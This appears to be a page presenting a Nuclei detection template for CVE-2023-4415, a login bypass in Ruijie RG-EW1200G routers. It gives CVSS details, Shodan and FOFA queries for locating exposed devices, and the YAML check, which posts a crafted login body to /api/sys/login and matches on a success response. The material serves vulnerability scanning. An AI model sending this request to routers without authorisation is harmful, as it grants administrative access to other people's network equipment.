Ruijie RG-EW1200G Router Background - Login Bypass

ID: CVE-2023-4415

Severity: high

Author: DhiyaneshDK

Tags: cve2023,cve,ruijie,router,ruijienetworks

Description

A vulnerability was found in Ruijie RG-EW1200G 07161417 r483. It has been rated as critical. Affected by this issue is some unknown functionality of the file /api/sys/login. The manipulation leads to improper authentication. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-237518 is the identifier assigned to this vulnerability.

YAML Source

id: CVE-2023-4415

info:
  name: Ruijie RG-EW1200G Router Background - Login Bypass
  author: DhiyaneshDK
  severity: high
  description: |
    A vulnerability was found in Ruijie RG-EW1200G 07161417 r483. It has been rated as critical. Affected by this issue is some unknown functionality of the file /api/sys/login. The manipulation leads to improper authentication. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-237518 is the identifier assigned to this vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-4415
    - https://github.com/blakespire/repoforcve/tree/main/RG-EW1200G-logic
    - https://vuldb.com/?ctiid.237518
    - https://vuldb.com/?id.237518
    - https://github.com/thedarknessdied/Ruijie_RG-EW1200G_login_bypass-CVE-2023-4415
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2023-4415
    cwe-id: CWE-287
    epss-score: 0.00593
    epss-percentile: 0.78272
    cpe: cpe:2.3:o:ruijienetworks:rg-ew1200g_firmware:07161417_r483:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: ruijienetworks
    product: rg-ew1200g_firmware
    shodan-query: http.html:"app.2fe6356cdd1ddd0eb8d6317d1a48d379.css"
    fofa-query: body="app.2fe6356cdd1ddd0eb8d6317d1a48d379.css"
  tags: cve2023,cve,ruijie,router,ruijienetworks

http:
  - method: POST
    path:
      - "{{BaseURL}}/api/sys/login"

    body: |
      {
        "username":"2",
        "password":"admin",
        "timestamp":1695218596000
      }

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"result":"ok"'
          - '"msg":"登入成功"'
        condition: and

      - type: word
        part: header
        words:
          - application/json

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100a6dfbd6e743a3164d9e26fdea92b7694a8d2acc17799a4a927ec19fec702226602202b05e717f97f9aef5979186ca9629eeb11d04ba2d7d34f12e2118dc5d3480be2:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-4415.yaml"

View on Github